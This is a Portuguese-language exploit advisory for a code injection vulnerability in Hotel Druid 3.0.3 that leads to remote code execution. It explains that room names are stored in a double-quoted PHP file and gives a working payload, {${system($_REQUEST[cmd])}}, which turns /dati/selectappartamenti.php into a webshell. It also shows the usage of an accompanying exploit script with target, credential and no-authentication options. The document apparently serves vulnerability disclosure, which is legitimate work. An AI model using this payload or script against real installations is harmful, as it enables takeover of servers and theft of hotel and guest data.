
Hotel Druid 3.0.3 Injeção de Código para Execução Remota de Código
Uma vulnerabilidade de Injeção de Código foi encontrada na aplicação Hotel Druid v3.0.3, que um atacante poderia explorar para executar código remoto no servidor.
Para uma exploração bem-sucedida, o atacante deve ter o privilégio de adicionar um novo quarto.
A vulnerabilidade ocorre porque os nomes dos quartos são armazenados dentro de um arquivo chamado /dati/selectappartamenti.php usando Aspas Duplas.
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
Para realizar uma exploração bem-sucedida, adicione um quarto com o seguinte payload como nome do quarto.
{${system($_REQUEST[cmd])}}
Após adicionar um novo quarto, vá para /dati/selectappartamenti.php e acione a webshell passando um comando usando o parâmetro cmd.
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help mostra esta mensagem de ajuda e sai
required arguments:
-t TARGET, --target TARGET
URL alvo. Exemplo : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Nome de usuário
-p PASSWORD, --password PASSWORD
Senha
--noauth Se nenhuma autenticação for necessária para acessar o painel
Se a aplicação não possui autenticação.
Use a flag --noauth para realizar a exploração sem autenticação.

Se o servidor possui autenticação ativada, use --username e --password para realizar a autenticação.

Pesquisador e escritor do POC - 0z09e